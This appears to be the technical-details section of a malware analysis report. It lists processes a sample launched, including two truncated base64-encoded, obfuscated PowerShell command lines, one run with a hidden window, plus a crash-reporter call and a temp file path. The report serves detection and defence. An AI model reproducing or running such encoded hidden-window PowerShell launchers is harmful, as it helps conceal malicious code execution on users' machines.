Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1378440.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9AC...' (with hidden window)